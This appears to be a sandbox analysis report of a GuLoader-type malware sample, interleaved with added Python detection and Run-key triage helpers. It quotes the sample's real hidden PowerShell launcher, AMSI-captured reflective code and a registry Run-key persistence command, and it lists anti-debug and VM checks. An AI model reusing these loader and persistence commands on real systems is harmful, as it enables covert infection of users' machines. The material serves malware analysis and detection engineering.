Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File written: C:\Users\user\AppData\Local\Temp\acrometer.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SwiftCopy_23052024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Tabsgivende.exe, Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbL source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb%B source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000002.00000002.2198487086.0000000009E4D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tandpastaer $Varmefrontens $Amorin), (Squamaceous @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ozzy = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Farvemssigt)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Friktioners, $false).DefineType($Aristokratis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"
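The command lines in this section (the PowerShell launcher that reads Venstrehaandsarbejdet.Uns and slices its own invoke verb out of that file with SubString(7349,3); the cmd.exe "set /A 1^^0" child; the REG ADD that persists a REG_EXPAND_SZ Run value beginning with %Jordbesiddere%) and the two AMSI buffers above are the points in this chain a detection engineer can key on. The Python below is an added example, not code from the Joe Sandbox report or from the malware: it takes those command lines and AMSI fragments, copied from the report as constructed input, and runs three checks over them. The rule names, the allowlist of benign environment variables and the assumption that a 3-character slice which is then dot-sourced is an 'iex'-style verb are this example's own; the report does not include the .Uns file, so the slice is not verified against it.

```python
"""Detection checks for the GuLoader process chain recorded in this report.

Added example, not part of the sandbox report or of the malware. The sample
events are the command lines and AMSI buffers copied from the report; the
rule names and the benign-variable allowlist are this example's own choices.
"""
import re
from dataclasses import dataclass

# Constructed sample input: (parent image, child command line) from the report.
PROCESS_EVENTS = [
    (r"C:\Users\user\Desktop\SwiftCopy_23052024.exe",
     r'''"powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"'''),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"'''),
    (r"C:\Users\user\AppData\Local\Temp\Tabsgivende.exe",
     r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"'''),
    (r"C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe",
     r'''"C:\Windows\SysWOW64\wlanext.exe"'''),
]
# Constructed sample input: script fragments as AMSI handed them to the scanner.
AMSI_EVENTS = [
    r"GetDelegateForFunctionPointer((Tandpastaer $Varmefrontens $Amorin), (Squamaceous @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ozzy = [AppDomain]::CurrentDomain.GetAssemblies()$global:",
    r"DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Farvemssigt)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Friktioners, $false).DefineType($Aristokratis",
]


@dataclass
class Finding:
    rule: str
    process: str
    detail: dict


# 1. $s=Get-Content file; $v=$s.SubString(n,3); .$v($s)
#    The verb that runs the payload is cut out of the payload itself, so it
#    never appears on the command line.
SELF_SLICE_INVOKE = re.compile(
    r"\$(?P<script>\w+)\s*=\s*Get-Content\b.*?"
    r"\$(?P<verb>\w+)\s*=\s*\$(?P=script)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)"
    r".*?[.&]\s*\$(?P=verb)\s*\(",
    re.IGNORECASE | re.DOTALL,
)


def check_self_slicing_launcher(cmdline):
    m = SELF_SLICE_INVOKE.search(cmdline)
    if not m or int(m.group("len")) > 4:   # 'iex'-sized slice, not a large chunk
        return None
    return {"script_var": m.group("script"), "offset": int(m.group("off")), "length": int(m.group("len"))}


# 2. REG ADD ...\Run /t REG_EXPAND_SZ /d "%PrivateVar% ..."
#    The executable is resolved from an environment variable at logon, so the
#    Run value itself names no binary.
RUN_KEY_ADD = re.compile(
    r'\bREG\s+ADD\s+(?P<key>\S*\\CurrentVersion\\(?:Run|RunOnce))\b'
    r'.*?/v\s+(?P<name>"[^"]*"|\S+)'
    r'.*?/t\s+(?P<type>REG_\w+)'
    r'.*?/d\s+"(?P<data>.*)"',
    re.IGNORECASE | re.DOTALL,
)
ENV_REF = re.compile(r"^%(\w+)%")
REG_FETCH = re.compile(r"Get-ItemProperty\s+-Path\s+'([^']+)'\s*\)\s*\.(\w+)", re.IGNORECASE)
BENIGN_ENV = {"SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "PROGRAMFILES", "PROGRAMFILES(X86)",
              "PROGRAMDATA", "USERPROFILE", "APPDATA", "LOCALAPPDATA"}


def check_run_key_indirection(cmdline):
    m = RUN_KEY_ADD.search(cmdline)
    if not m or m.group("type").upper() != "REG_EXPAND_SZ":
        return None
    data = m.group("data")
    env = ENV_REF.match((data.split() or [""])[0].strip('"'))
    if not env or env.group(1).upper() in BENIGN_ENV:
        return None
    fetch = REG_FETCH.search(data)   # next stage kept in the registry, if any
    return {"key": m.group("key"), "value_name": m.group("name").strip('"'),
            "env_var": env.group(1),
            "payload_registry": (fetch.group(1), fetch.group(2)) if fetch else None}


# 3. Reflection.Emit plus GetDelegateForFunctionPointer: a native function
#    pointer wrapped in a delegate without Add-Type, so no compiled assembly
#    touches disk.
REFLECTIVE_TOKENS = ("GetDelegateForFunctionPointer", "DefineDynamicAssembly",
                     "DefineDynamicModule", "DefineType", "AssemblyBuilderAccess]::Run")


def check_reflective_pinvoke(content):
    hits = [t for t in REFLECTIVE_TOKENS if t.lower() in content.lower()]
    return hits if ("GetDelegateForFunctionPointer" in hits or len(hits) >= 2) else []


def triage(process_events=PROCESS_EVENTS, amsi_events=AMSI_EVENTS):
    findings = []
    for parent, cmdline in process_events:
        hit = check_self_slicing_launcher(cmdline)
        if hit:
            findings.append(Finding("self_slicing_launcher", parent, hit))
        hit = check_run_key_indirection(cmdline)
        if hit:
            findings.append(Finding("run_key_env_indirection", parent, hit))
    for content in amsi_events:
        hits = check_reflective_pinvoke(content)
        if hits:
            findings.append(Finding("reflective_pinvoke", "powershell.exe (AMSI)", {"tokens": hits}))
    return findings


if __name__ == "__main__":
    for f in triage():
        print(f"{f.rule:26} {f.process}\n    {f.detail}")
```

Run as a script it prints the four findings for the sample; imported, the check_* functions take command lines from your own process-creation telemetry (Sysmon event 1, or Security 4688 with command-line auditing enabled) and, for the reflective check, the script text that PowerShell script block logging (event 4104) records alongside what AMSI sees.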
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447AA05 pushfd ; retn 0007h 2_2_0447AA2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044794F7 push eax; ret 2_2_044794FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044794FB push eax; ret 2_2_04479502
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479581 push ecx; ret 2_2_04479582
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479589 push ecx; ret 2_2_0447958A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044796BB pushad ; retn 0007h 2_2_044796CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479365 push edx; retn 0007h 2_2_0447936A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0447936F push ebx; retn 0007h 2_2_0447938A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479335 push edx; retn 0007h 2_2_0447935A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044793CF push esp; retn 0007h 2_2_044793CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044793E5 push esi; retn 0007h 2_2_044793EA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044793EF push edi; retn 0007h 2_2_044793FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044793BB push esp; retn 0007h 2_2_044793CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479D98 pushad ; ret 2_2_04479E4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04479975 push ebx; ret 2_2_044799A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_044799A9 push ebx; ret 2_2_044799AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_06FEC35C push eax; ret 2_2_06FEC35D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08882E98 push cs; iretd 2_2_08882F17
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_088836C8 push ecx; retf 2_2_088836D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_088807D3 push esp; iretd 2_2_088807EC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08882F0E push cs; iretd 2_2_08882F17
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225209AD push ecx; mov dword ptr [esp], ecx 18_2_225209B6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_016607D3 push esp; iretd 18_2_016607EC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_016636C8 push ecx; retf 18_2_016636D2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_01662F0E push cs; iretd 18_2_01662F17
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_01662E98 push cs; iretd 18_2_01662F17
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key
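The Run value written above is REG_EXPAND_SZ and its data starts with %Jordbesiddere% rather than a path, so the binary that actually launches at logon is whatever that per-user environment variable expands to at that moment; the rest of the data reads the real stage out of HKCU:\Oplukkelig\Bractlets52 and passes it to the same executable. The report never shows Jordbesiddere being set; for the entry to work it has to expand to a PowerShell executable, and the SysWOW64 powershell.exe path used in the sample environment below is an assumption made for this example. The Python that follows is an added triage helper, not part of the report: it expands such entries the way the logon shell does (case-insensitive lookup, unknown tokens left in place) and flags any whose executable hides behind a non-standard or unresolvable variable. The Run entries other than 'Startup key' and the environment mapping are constructed; the collector that reads a live host's HKCU Run key and HKCU\Environment only runs where winreg is available.

```python
"""Triage REG_EXPAND_SZ Run entries the way the logon shell will expand them.

Added example, not part of the sandbox report. Only the 'Startup key' data is
copied from the report; the other entries, the environment mapping and the
value assumed for %Jordbesiddere% are constructed for this example.
"""
import re

# Variables a legitimate Run entry commonly expands; anything else is a tell.
STANDARD_VARS = {
    "SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "PROGRAMFILES", "PROGRAMFILES(X86)",
    "PROGRAMW6432", "COMMONPROGRAMFILES", "PROGRAMDATA", "ALLUSERSPROFILE",
    "USERPROFILE", "APPDATA", "LOCALAPPDATA", "TEMP", "TMP", "PUBLIC",
    "HOMEDRIVE", "HOMEPATH", "COMSPEC",
}
ENV_TOKEN = re.compile(r"%([^%]+)%")

SAMPLE_RUN_ENTRIES = [  # (value name, value type, data) as reg.exe wrote them
    ("Startup key", "REG_EXPAND_SZ",
     r"%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"),
    ("OneDrive", "REG_SZ", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("ExampleTool", "REG_EXPAND_SZ", r'"%LOCALAPPDATA%\ExampleTool\tool.exe" --tray'),
]
# Assumed per-user environment: the report does not show Jordbesiddere being set.
SAMPLE_USER_ENV = {
    "Jordbesiddere": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    "LOCALAPPDATA": r"C:\Users\user\AppData\Local",
}


def expand(data, env_upper):
    """ExpandEnvironmentStrings semantics: case-insensitive lookup; tokens that
    do not resolve are left exactly as written rather than becoming empty."""
    return ENV_TOKEN.sub(lambda m: env_upper.get(m.group(1).upper(), m.group(0)), data)


def first_token(command):
    """The executable part of a Run value: a quoted path or the first word."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(None, 1)[0] if command else ""


def assess_run_entries(entries, env):
    env_upper = {k.upper(): v for k, v in env.items()}
    rows = []
    for name, kind, data in entries:
        used = ENV_TOKEN.findall(data)
        nonstandard = sorted({v for v in used if v.upper() not in STANDARD_VARS})
        unresolved = sorted({v for v in used if v.upper() not in env_upper})
        # Only REG_EXPAND_SZ data is expanded here; REG_SZ is taken literally.
        expanded = expand(data, env_upper) if kind == "REG_EXPAND_SZ" else data
        if kind == "REG_EXPAND_SZ" and first_token(data).startswith("%") and nonstandard:
            verdict = "suspicious"   # executable hidden behind a private variable
        elif unresolved:
            verdict = "unresolved"   # entry is dead, or the variable is set elsewhere
        else:
            verdict = "ok"
        rows.append({"name": name, "type": kind, "verdict": verdict,
                     "executable": first_token(expanded),
                     "nonstandard_vars": nonstandard, "unresolved_vars": unresolved})
    return rows


def collect_from_host():
    """Read HKCU Run entries and the per-user Environment key on a live Windows host."""
    import winreg  # Windows only; ImportError elsewhere
    names = {winreg.REG_SZ: "REG_SZ", winreg.REG_EXPAND_SZ: "REG_EXPAND_SZ"}

    def values(path):
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            i = 0
            while True:
                try:
                    yield winreg.EnumValue(key, i)   # (name, data, type)
                except OSError:                      # no more values
                    return
                i += 1

    entries = [(n, names.get(t, str(t)), str(d))
               for n, d, t in values(r"Software\Microsoft\Windows\CurrentVersion\Run")]
    env = {n: str(d) for n, d, t in values("Environment")}
    return entries, env


if __name__ == "__main__":
    try:
        entries, env = collect_from_host()
    except (ImportError, OSError):
        entries, env = SAMPLE_RUN_ENTRIES, SAMPLE_USER_ENV
    for row in assess_run_entries(entries, env):
        print(f'{row["verdict"]:10} {row["name"]!r:16} -> {row["executable"]}')
```

On a live host the value named in the Get-ItemProperty call (Bractlets52 under HKCU:\Oplukkelig for this sample) holds the stage that the Run entry feeds to PowerShell; export it before deleting the Run value and the variable, otherwise that artefact disappears together with the persistence.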
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256096E rdtsc 18_2_2256096E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7598 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2169 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe API coverage: 0.3 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_004062F0 FindFirstFileA,FindClose, 0_2_004062F0
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004057B5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: SwiftCopy_23052024.exe, 00000000.00000002.1237405102.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Tabsgivende.exe, 00000012.00000002.2361654109.0000000006610000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2361867653.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2244185698.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243920932.0000000006662000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SwiftCopy_23052024.exe, 00000000.00000002.1237405102.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.2193801394.0000000006D12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256096E rdtsc 18_2_2256096E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_026ED244 LdrInitializeThunk,LdrInitializeThunk, 2_2_026ED244
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A250 mov eax, dword ptr fs:[00000030h] 18_2_2251A250
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526259 mov eax, dword ptr fs:[00000030h] 18_2_22526259
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A8243 mov eax, dword ptr fs:[00000030h] 18_2_225A8243
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A8243 mov ecx, dword ptr fs:[00000030h] 18_2_225A8243
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225D0274 mov eax, dword ptr fs:[00000030h] 18_2_225D0274
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524260 mov eax, dword ptr fs:[00000030h] 18_2_22524260
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251826B mov eax, dword ptr fs:[00000030h] 18_2_2251826B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251823B mov eax, dword ptr fs:[00000030h] 18_2_2251823B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A2C3 mov eax, dword ptr fs:[00000030h] 18_2_2252A2C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225302E1 mov eax, dword ptr fs:[00000030h] 18_2_225302E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E284 mov eax, dword ptr fs:[00000030h] 18_2_2255E284
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0283 mov eax, dword ptr fs:[00000030h] 18_2_225A0283
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225302A0 mov eax, dword ptr fs:[00000030h] 18_2_225302A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h] 18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B62A0 mov ecx, dword ptr fs:[00000030h] 18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B62A0 mov eax, dword ptr fs:[00000030h] 18_2_225B62A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h] 18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A035C mov ecx, dword ptr fs:[00000030h] 18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A035C mov eax, dword ptr fs:[00000030h] 18_2_225A035C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EA352 mov eax, dword ptr fs:[00000030h] 18_2_225EA352
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A2349 mov eax, dword ptr fs:[00000030h] 18_2_225A2349
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225C437C mov eax, dword ptr fs:[00000030h] 18_2_225C437C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C310 mov ecx, dword ptr fs:[00000030h] 18_2_2251C310
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22540310 mov ecx, dword ptr fs:[00000030h] 18_2_22540310
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A30B mov eax, dword ptr fs:[00000030h] 18_2_2255A30B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DC3CD mov eax, dword ptr fs:[00000030h] 18_2_225DC3CD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A3C0 mov eax, dword ptr fs:[00000030h] 18_2_2252A3C0
